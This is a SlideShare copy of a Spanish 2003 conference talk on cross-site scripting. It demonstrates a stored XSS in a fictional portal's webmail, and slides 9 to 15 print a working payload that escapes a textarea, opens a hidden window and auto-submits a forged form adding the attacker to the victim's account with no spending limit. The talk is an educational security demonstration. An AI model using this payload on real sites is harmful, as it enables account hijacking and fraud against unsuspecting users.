SlideShare una empresa de Scribd logo
1 de 17
FIST Conference October 2003 @




Cross-site scripting
   © Rafael San Miguel Carrasco
XSS

                  Portal exclusivo para clientes de SMC:



                    webmail

                    grupos de usuarios (1 cuenta, múltiples usuarios)

                    compra de entradas, discos, libros, videojuegos, etc.




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com     2
XSS

                  Autenticación:

                  Basada en login/password, al inicio de cada sesión.
                  En adelante, una cookie que se utiliza como credencial
                  para todos los recursos del portal.




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com        3
XSS

                  2 vulnerabilidades:


                       el webmail es vulnerable a XSS (al leer un mensaje
                        con contenido malicioso)
                    es posible automatizar el proceso de inclusión de un
                        nuevo usuario a nuestra cuenta




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com       4
XSS

                  Añadir a un usuario a mi lista:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   5
XSS




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   6
XSS




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   7
XSS
                  HTML form en datosusuario.php:
                  (qué se envía a confirma.php)
                    echo "<form action=confirma.php method=post>";
                    echo "<p>Su nombre: <b>Rafael San Miguel Carrasco</b><br>";
                    echo "<input type=hidden name=nombre value=Rafael San Miguel>";
                    echo "Usuario que desea añadir: <b>$duser</b><br>";
                    echo "<input type=hidden name=nuevo value='$duser'>";
                    echo "Cuenta asociada a la línea: <b>91 466 56 89</b></p>";
                    echo "<input type=hidden name=linea value=91 466 56 89>";
                    <p>Limite de consumo:
                    <select name="limite">
                    <option value="">Seleccione una cantidad
                    <option value="100">100 euros
                    <option value="200">200 euros
                    <option value="500">500 euros
                    <option value="0">Sin límite
                    </select><p>
© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com            8
XSS

                  Utilizando form reloading:

                     <form action=http://127.0.0.1/confirma.php method=post>
                     <input type=hidden name=nombre value=Rafael San Miguel Carrasco>
                     <input type=hidden name=nuevo value='Julia Villanueva'>
                     <input type=hidden name=linea value=91 466 56 89>
                     <input type=hidden name=limite value=0>
                     <input type=submit value=enviar>
                     </form>


                   Luego es posible reducir los tres pasos de
                   procedimiento original a un solo paso.


© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com            9
XSS
                  Comprobamos que es vulnerable a XSS:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   10
XSS

                  Inicialmente, parece que no:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   11
XSS

                  Cerramos </textarea>, ahora sí:




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com   12
XSS

                  Insertamos el form anterior, con algunos
                  cambios:


                    el código se carga en otra ventana

                    el envío del formulario es automático

                    se intenta ocultar la ventana (dimensión mínima,
                        localización más alla de los límites de la pantalla




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com             13
XSS

                  Por lo tanto:

                  1.    El usuario víctima recibe el e-mail
                  2.    Al abrirlo, se ejecuta el código del formulario en otra
                        ventana, sin que éste lo advierta
                  3.    El envío del formulario supone mi inclusión en la lista de
                        usuarios de la víctima




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com             14
XSS

                      Éste es el formulario modificado:
                   
                  </textarea><script>v = window.open (<parametros de localizacion y tamaño>);
                  v.document.write ('<body><form name=f action=http://127.0.0.1/confirma.php
                  method=post>');
                  v.document.write ('<input type=hidden name=nombre value=víctima>');
                  v.document.write ('<input type=hidden name=nuevo value=nuestro nombre>');
                  v.document.write ('<input type=hidden name=linea value=teléfono de la víctima>');
                  v.document.write ('<input type=hidden name=limite value=0>');
                  v.document.write ('<img src=bla.jpg onError=document.f.submit ()></form>
                  </body>');
                  v.close ();
                  </script>




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com                     15
Herramientas de detección
                  de vulnerabilidades



                     <script> function openBrWindow(theURL,winName,features) {
                     window.open(theURL,winName,features); } </script>

                     <a href="#" onClick="openBrWindow('bla.html','','');"> <img
                     src="bla.jpg"></a>




© Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com            16
Cross-site scripting
FIST Conference October 2003
© Rafael San Miguel Carrasco
Madrid, 25 October 2003

Más contenido relacionado

Similar a Exploiting Web Applications XSS

Exploiting Web applications SQL Injection
Exploiting Web applications SQL InjectionExploiting Web applications SQL Injection
Exploiting Web applications SQL InjectionConferencias FIST
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridadguestbfa74a
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones webJose Mato
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)kernelinux
 
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaMitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaSoftware Guru
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones webAlan Resendiz
 
Encriptación parte 1
Encriptación parte 1Encriptación parte 1
Encriptación parte 1Mian Rosales
 

Similar a Exploiting Web Applications XSS (15)

Exploiting Web applications SQL Injection
Exploiting Web applications SQL InjectionExploiting Web applications SQL Injection
Exploiting Web applications SQL Injection
 
Presentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona SeguridadPresentación Workshop php Barcelona Seguridad
Presentación Workshop php Barcelona Seguridad
 
Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015Completo conferencia seguridad_web_software_libre_2015
Completo conferencia seguridad_web_software_libre_2015
 
Seguridad en aplicaciones web
Seguridad en aplicaciones webSeguridad en aplicaciones web
Seguridad en aplicaciones web
 
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
XSS to the MAX - Juan Manuel Garcia (OWASP LATAM TOUR 2016)
 
Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.Seguridad WEB - Principios básicos.
Seguridad WEB - Principios básicos.
 
Esquemas de seguridad para el servidor
Esquemas de seguridad para el servidorEsquemas de seguridad para el servidor
Esquemas de seguridad para el servidor
 
Codigos para html
Codigos para htmlCodigos para html
Codigos para html
 
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + SemánticaMitigando Eventualidades de Seguridad en Web 2.0 + Semántica
Mitigando Eventualidades de Seguridad en Web 2.0 + Semántica
 
Samm owasp
Samm owaspSamm owasp
Samm owasp
 
Ataques a aplicaciones web
Ataques a aplicaciones webAtaques a aplicaciones web
Ataques a aplicaciones web
 
Encriptación parte 1
Encriptación parte 1Encriptación parte 1
Encriptación parte 1
 
Seguridad en los sistemas web
Seguridad en los sistemas webSeguridad en los sistemas web
Seguridad en los sistemas web
 
Ejemnplos java nuevos
Ejemnplos java nuevosEjemnplos java nuevos
Ejemnplos java nuevos
 
Xss attacks
Xss attacksXss attacks
Xss attacks
 

Más de Conferencias FIST

Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceConferencias FIST
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseConferencias FIST
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiConferencias FIST
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security ForumConferencias FIST
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes WirelessConferencias FIST
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la ConcienciaciónConferencias FIST
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloConferencias FIST
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseConferencias FIST
 

Más de Conferencias FIST (20)

Seguridad en Open Solaris
Seguridad en Open SolarisSeguridad en Open Solaris
Seguridad en Open Solaris
 
Seguridad en Entornos Web Open Source
Seguridad en Entornos Web Open SourceSeguridad en Entornos Web Open Source
Seguridad en Entornos Web Open Source
 
Spanish Honeynet Project
Spanish Honeynet ProjectSpanish Honeynet Project
Spanish Honeynet Project
 
Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
 
SAP Security
SAP SecuritySAP Security
SAP Security
 
Que es Seguridad
Que es SeguridadQue es Seguridad
Que es Seguridad
 
Network Access Protection
Network Access ProtectionNetwork Access Protection
Network Access Protection
 
Las Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática ForenseLas Evidencias Digitales en la Informática Forense
Las Evidencias Digitales en la Informática Forense
 
Evolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFiEvolución y situación actual de la seguridad en redes WiFi
Evolución y situación actual de la seguridad en redes WiFi
 
El Information Security Forum
El Information Security ForumEl Information Security Forum
El Information Security Forum
 
Criptografia Cuántica
Criptografia CuánticaCriptografia Cuántica
Criptografia Cuántica
 
Inseguridad en Redes Wireless
Inseguridad en Redes WirelessInseguridad en Redes Wireless
Inseguridad en Redes Wireless
 
Mas allá de la Concienciación
Mas allá de la ConcienciaciónMas allá de la Concienciación
Mas allá de la Concienciación
 
Security Metrics
Security MetricsSecurity Metrics
Security Metrics
 
PKI Interoperability
PKI InteroperabilityPKI Interoperability
PKI Interoperability
 
Wifislax 3.1
Wifislax 3.1Wifislax 3.1
Wifislax 3.1
 
Network Forensics
Network ForensicsNetwork Forensics
Network Forensics
 
Riesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el DesarrolloRiesgo y Vulnerabilidades en el Desarrollo
Riesgo y Vulnerabilidades en el Desarrollo
 
Demostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis ForenseDemostracion Hacking Honeypot y Análisis Forense
Demostracion Hacking Honeypot y Análisis Forense
 
Security Maturity Model
Security Maturity ModelSecurity Maturity Model
Security Maturity Model
 

Último

ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...FacuMeza2
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdfIsabellaMontaomurill
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMidwarHenryLOZAFLORE
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELmaryfer27m
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxazmysanros90
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfSergioMendoza354770
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA241531640
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.241514949
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxNombre Apellidos
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son241514984
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx241523733
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxaylincamaho
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafiosFundación YOD YOD
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaarkananubis
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxJOSEFERNANDOARENASCA
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptMiguelAtencio10
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadMiguelAngelVillanuev48
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx241522327
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxpabonheidy28
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativaAdrianaMartnez618894
 

Último (20)

ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
ATAJOS DE WINDOWS. Los diferentes atajos para utilizar en windows y ser más e...
 
trabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdftrabajotecologiaisabella-240424003133-8f126965.pdf
trabajotecologiaisabella-240424003133-8f126965.pdf
 
Mapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptxMapa-conceptual-del-Origen-del-Universo-3.pptx
Mapa-conceptual-del-Origen-del-Universo-3.pptx
 
El uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFELEl uso delas tic en la vida cotidiana MFEL
El uso delas tic en la vida cotidiana MFEL
 
tics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptxtics en la vida cotidiana prepa en linea modulo 1.pptx
tics en la vida cotidiana prepa en linea modulo 1.pptx
 
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdfPARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
PARTES DE UN OSCILOSCOPIO ANALOGICO .pdf
 
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6    CREAR UN RECURSO MULTIMEDIAActividad integradora 6    CREAR UN RECURSO MULTIMEDIA
Actividad integradora 6 CREAR UN RECURSO MULTIMEDIA
 
El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.El uso de las TIC's en la vida cotidiana.
El uso de las TIC's en la vida cotidiana.
 
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptxCrear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
Crear un recurso multimedia. Maricela_Ponce_DomingoM1S3AI6-1.pptx
 
El uso de las tic en la vida ,lo importante que son
El uso de las tic en la vida ,lo importante  que sonEl uso de las tic en la vida ,lo importante  que son
El uso de las tic en la vida ,lo importante que son
 
GonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptxGonzalezGonzalez_Karina_M1S3AI6... .pptx
GonzalezGonzalez_Karina_M1S3AI6... .pptx
 
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptxMedidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
Medidas de formas, coeficiente de asimetría y coeficiente de curtosis.pptx
 
La era de la educación digital y sus desafios
La era de la educación digital y sus desafiosLa era de la educación digital y sus desafios
La era de la educación digital y sus desafios
 
R1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en minaR1600G CAT Variables de cargadores en mina
R1600G CAT Variables de cargadores en mina
 
Arenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptxArenas Camacho-Practica tarea Sesión 12.pptx
Arenas Camacho-Practica tarea Sesión 12.pptx
 
dokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.pptdokumen.tips_36274588-sistema-heui-eui.ppt
dokumen.tips_36274588-sistema-heui-eui.ppt
 
Presentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidadPresentación inteligencia artificial en la actualidad
Presentación inteligencia artificial en la actualidad
 
FloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptxFloresMorales_Montserrath_M1S3AI6 (1).pptx
FloresMorales_Montserrath_M1S3AI6 (1).pptx
 
Plan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docxPlan de aula informatica segundo periodo.docx
Plan de aula informatica segundo periodo.docx
 
definicion segun autores de matemáticas educativa
definicion segun autores de matemáticas  educativadefinicion segun autores de matemáticas  educativa
definicion segun autores de matemáticas educativa
 

Exploiting Web Applications XSS

  • 1. FIST Conference October 2003 @ Cross-site scripting © Rafael San Miguel Carrasco
  • 2. XSS Portal exclusivo para clientes de SMC:  webmail  grupos de usuarios (1 cuenta, múltiples usuarios)  compra de entradas, discos, libros, videojuegos, etc. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 2
  • 3. XSS Autenticación: Basada en login/password, al inicio de cada sesión. En adelante, una cookie que se utiliza como credencial para todos los recursos del portal. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 3
  • 4. XSS 2 vulnerabilidades:  el webmail es vulnerable a XSS (al leer un mensaje con contenido malicioso)  es posible automatizar el proceso de inclusión de un nuevo usuario a nuestra cuenta © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 4
  • 5. XSS Añadir a un usuario a mi lista: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 5
  • 6. XSS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 6
  • 7. XSS © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 7
  • 8. XSS HTML form en datosusuario.php: (qué se envía a confirma.php) echo "<form action=confirma.php method=post>"; echo "<p>Su nombre: <b>Rafael San Miguel Carrasco</b><br>"; echo "<input type=hidden name=nombre value=Rafael San Miguel>"; echo "Usuario que desea añadir: <b>$duser</b><br>"; echo "<input type=hidden name=nuevo value='$duser'>"; echo "Cuenta asociada a la línea: <b>91 466 56 89</b></p>"; echo "<input type=hidden name=linea value=91 466 56 89>"; <p>Limite de consumo: <select name="limite"> <option value="">Seleccione una cantidad <option value="100">100 euros <option value="200">200 euros <option value="500">500 euros <option value="0">Sin límite </select><p> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 8
  • 9. XSS Utilizando form reloading: <form action=http://127.0.0.1/confirma.php method=post> <input type=hidden name=nombre value=Rafael San Miguel Carrasco> <input type=hidden name=nuevo value='Julia Villanueva'> <input type=hidden name=linea value=91 466 56 89> <input type=hidden name=limite value=0> <input type=submit value=enviar> </form> Luego es posible reducir los tres pasos de procedimiento original a un solo paso. © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 9
  • 10. XSS Comprobamos que es vulnerable a XSS: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 10
  • 11. XSS Inicialmente, parece que no: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 11
  • 12. XSS Cerramos </textarea>, ahora sí: © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 12
  • 13. XSS Insertamos el form anterior, con algunos cambios:  el código se carga en otra ventana  el envío del formulario es automático  se intenta ocultar la ventana (dimensión mínima, localización más alla de los límites de la pantalla © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 13
  • 14. XSS Por lo tanto: 1. El usuario víctima recibe el e-mail 2. Al abrirlo, se ejecuta el código del formulario en otra ventana, sin que éste lo advierta 3. El envío del formulario supone mi inclusión en la lista de usuarios de la víctima © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 14
  • 15. XSS Éste es el formulario modificado:   </textarea><script>v = window.open (<parametros de localizacion y tamaño>); v.document.write ('<body><form name=f action=http://127.0.0.1/confirma.php method=post>'); v.document.write ('<input type=hidden name=nombre value=víctima>'); v.document.write ('<input type=hidden name=nuevo value=nuestro nombre>'); v.document.write ('<input type=hidden name=linea value=teléfono de la víctima>'); v.document.write ('<input type=hidden name=limite value=0>'); v.document.write ('<img src=bla.jpg onError=document.f.submit ()></form> </body>'); v.close (); </script> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 15
  • 16. Herramientas de detección de vulnerabilidades <script> function openBrWindow(theURL,winName,features) { window.open(theURL,winName,features); } </script> <a href="#" onClick="openBrWindow('bla.html','','');"> <img src="bla.jpg"></a> © Rafael San Miguel Carrasco, rsmc@soluciones-seguras.com 16
  • 17. Cross-site scripting FIST Conference October 2003 © Rafael San Miguel Carrasco Madrid, 25 October 2003

Notas del editor

  1. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  2. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  3. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  4. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  5. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  6. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  7. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  8. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  9. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  10. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  11. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  12. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.
  13. Para la mayor parte de las organizaciones los activos se dividen entre críticos y no críticos.